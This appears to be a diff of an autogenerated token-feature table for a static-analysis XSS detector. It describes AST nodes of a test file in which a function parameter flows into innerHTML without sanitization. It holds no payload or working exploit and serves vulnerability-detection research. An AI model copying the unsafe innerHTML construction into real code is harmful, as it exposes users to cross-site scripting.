contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:12 | document | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:12 | document | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:12 | document | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:12 | document | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:17 | document.body | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:17 | document.body | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:17 | document.body | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:17 | document.body | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:17 | document.body | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:27 | documen ... nerHTML | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:27 | documen ... nerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:27 | documen ... nerHTML | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:27 | documen ... nerHTML | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:27 | documen ... nerHTML | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:34 | documen ... = html | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:34 | documen ... = html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:34 | documen ... = html | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:34 | documen ... = html | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:5:3:34 | documen ... = html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:14:3:17 | body | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:14:3:17 | body | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:14:3:17 | body | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:14:3:17 | body | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:14:3:17 | body | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:19:3:27 | innerHTML | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:19:3:27 | innerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:19:3:27 | innerHTML | enclosingFunctionBody | s html s document body innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:19:3:27 | innerHTML | enclosingFunctionName | basicHtmlConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:19:3:27 | innerHTML | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:31:3:34 | html | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:31:3:34 | html | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:31:3:34 | html | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:31:3:34 | html | enclosingFunctionBody | s html s document body innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:31:3:34 | html | enclosingFunctionName | basicHtmlConstruction | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:3:31:3:34 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:6:7 | this | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:6:7 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:6:7 | this | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:6:7 | this | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:6:7 | this | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | 'arguments' object of function insertIntoCreatedDocument | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | 'arguments' object of function insertIntoCreatedDocument | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | 'arguments' object of function insertIntoCreatedDocument | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | 'arguments' object of function insertIntoCreatedDocument | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | 'arguments' object of function insertIntoCreatedDocument | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | exceptional return of function insertIntoCreatedDocument | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | exceptional return of function insertIntoCreatedDocument | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | exceptional return of function insertIntoCreatedDocument | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | exceptional return of function insertIntoCreatedDocument | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | exceptional return of function insertIntoCreatedDocument | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | functio ... ENCY]\\n} | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | functio ... ENCY]\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | functio ... ENCY]\\n} | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | return of function insertIntoCreatedDocument | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | return of function insertIntoCreatedDocument | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | return of function insertIntoCreatedDocument | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | return of function insertIntoCreatedDocument | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:8:9:1 | return of function insertIntoCreatedDocument | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:17:6:41 | insertI ... ocument | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:17:6:41 | insertI ... ocument | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:17:6:41 | insertI ... ocument | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:43:6:43 | s | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:43:6:43 | s | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:43:6:43 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:43:6:43 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:43:6:43 | s | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:43:6:43 | s | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:43:6:43 | s | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:43:6:43 | s | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:43:6:43 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:6:43:6:43 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:16 | newDoc | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:16 | newDoc | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:16 | newDoc | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:16 | newDoc | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:16 | newDoc | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:65 | newDoc | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:65 | newDoc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:65 | newDoc | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:65 | newDoc | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:65 | newDoc | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:65 | newDoc ... ent("") | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:65 | newDoc ... ent("") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:65 | newDoc ... ent("") | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:65 | newDoc ... ent("") | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:11:7:65 | newDoc ... ent("") | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:27 | document | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:27 | document | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:27 | document | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:27 | document | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:27 | document | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:42 | documen ... ntation | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:42 | documen ... ntation | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:42 | documen ... ntation | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:42 | documen ... ntation | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:42 | documen ... ntation | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:61 | documen ... ocument | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:61 | documen ... ocument | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:61 | documen ... ocument | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:61 | documen ... ocument | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:61 | documen ... ocument | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:65 | documen ... ent("") | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:65 | documen ... ent("") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:65 | documen ... ent("") | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:65 | documen ... ent("") | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:65 | documen ... ent("") | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:65 | exceptional return of documen ... ent("") | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:65 | exceptional return of documen ... ent("") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:65 | exceptional return of documen ... ent("") | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:65 | exceptional return of documen ... ent("") | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:20:7:65 | exceptional return of documen ... ent("") | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:29:7:42 | implementation | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:29:7:42 | implementation | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:29:7:42 | implementation | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:29:7:42 | implementation | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:29:7:42 | implementation | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:44:7:61 | createHTMLDocument | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:44:7:61 | createHTMLDocument | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:44:7:61 | createHTMLDocument | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:44:7:61 | createHTMLDocument | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:44:7:61 | createHTMLDocument | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:63:7:64 | "" | CalleeFlexibleAccessPath | document.implementation.createHTMLDocument | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:63:7:64 | "" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:63:7:64 | "" | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | @@ -23640,12 +154474,47 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:63:7:64 | "" | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:63:7:64 | "" | enclosingFunctionName | insertIntoCreatedDocument | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:7:63:7:64 | "" | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:10 | newDoc | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:10 | newDoc | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:10 | newDoc | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:10 | newDoc | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:10 | newDoc | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:15 | newDoc.body | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:15 | newDoc.body | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:15 | newDoc.body | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:15 | newDoc.body | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:15 | newDoc.body | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:25 | newDoc. ... nerHTML | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:25 | newDoc. ... nerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:25 | newDoc. ... nerHTML | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:25 | newDoc. ... nerHTML | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:25 | newDoc. ... nerHTML | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:52 | newDoc. ... /span>" | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:52 | newDoc. ... /span>" | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:52 | newDoc. ... /span>" | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:52 | newDoc. ... /span>" | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:5:8:52 | newDoc. ... /span>" | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:12:8:15 | body | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:12:8:15 | body | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:12:8:15 | body | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:12:8:15 | body | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:12:8:15 | body | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:17:8:25 | innerHTML | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:17:8:25 | innerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:17:8:25 | innerHTML | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:17:8:25 | innerHTML | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:17:8:25 | innerHTML | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:36 | "" | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:36 | "" | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:36 | "" | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:36 | "" | enclosingFunctionName | insertIntoCreatedDocument | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:36 | "" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:36 | "" | stringConcatenatedWith | -endpoint- s + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:40 | "" + s | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:40 | "" + s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:40 | "" + s | enclosingFunctionBody | s newDoc document implementation createHTMLDocument newDoc body innerHTML s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:40 | "" + s | enclosingFunctionName | insertIntoCreatedDocument | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:40 | "" + s | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:52 | " ... /span>" | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:52 | " ... /span>" | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:29:8:52 | " ... /span>" | contextSurroundingFunctionParameters | (s) | @@ -23664,12 +154533,145 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:44:8:52 | "" | enclosingFunctionName | insertIntoCreatedDocument | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:44:8:52 | "" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:8:44:8:52 | "" | stringConcatenatedWith | '' + s -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:11:7 | this | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:11:7 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:11:7 | this | enclosingFunctionBody | s s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:11:7 | this | enclosingFunctionName | id | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:11:7 | this | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | 'arguments' object of function id | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | 'arguments' object of function id | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | 'arguments' object of function id | enclosingFunctionBody | s s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | 'arguments' object of function id | enclosingFunctionName | id | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | 'arguments' object of function id | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | exceptional return of function id | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | exceptional return of function id | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | exceptional return of function id | enclosingFunctionBody | s s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | exceptional return of function id | enclosingFunctionName | id | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | exceptional return of function id | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | functio ... rn s;\\n} | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | functio ... rn s;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | functio ... rn s;\\n} | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | return of function id | contextFunctionInterfaces | basicHtmlConstruction(s)\nid(s)\ninsertIntoCreatedDocument(s)\nnotVulnerable() | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | return of function id | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | return of function id | enclosingFunctionBody | s s | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | return of function id | enclosingFunctionName | id | +| autogenerated/Xss/UnsafeHtmlConstruction/typed.ts:11:8:13:1 | return of function id | fileImports | | 